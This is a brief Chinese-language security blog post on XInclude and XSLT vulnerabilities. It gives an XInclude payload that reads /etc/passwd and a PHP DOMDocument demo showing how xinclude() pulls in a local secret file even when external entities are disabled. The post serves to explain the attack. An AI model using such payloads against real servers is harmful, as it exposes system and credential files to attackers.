Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

XInclude and XSLT potential vulnerabilities

wpadmin~November 16, 2018 /Uncategorized

XInclude and XSLT potential vulnerabilities

Contents

XInclude and XSLT potential vulnerabilities

XInclude

文件读取

xinclude demo

<?xml version="1.0" ?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
 <xi:include href="file:///etc/passwd" parse="text"/>
</root>

xinclude_demo.php

即使 XML 解析器 (libxml) 未开启解析外部实体,攻击仍然能成功,
但是要求后端必须调用 DOMDocument::xinclude ([ int $options ] ) 函数,才能生效。

<?php
    $xml = <<<EOD
<?xml version="1.0" ?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
 <xi:include href="file:///d:/secret.txt" parse="text"/>
</root>
EOD;
    $dom = new DOMDocument;

    // 查看 libxml 版本
    echo LIBXML_DOTTED_VERSION;
    $dom->preserveWhiteSpace = false;
    $dom->formatOutput = true;
    $dom->loadXML($xml);
    $dom->xinclude();
    echo $dom->saveXML();
?>

XSLT

XSL 扩展样式表语言 (eXtensible Stylesheet Language, XSL)
XSLT (XSL Transfrom) 指 XSL 转换。

参考资料

浅析xml之xinclude & xslt
https://www.anquanke.com/post/id/156227

Black Hat USA 2015 Abusing XSLT For Practical Attacks, by Fernando Arnaboldi

Leave a Reply

Your email address will not be published. Required fields are marked *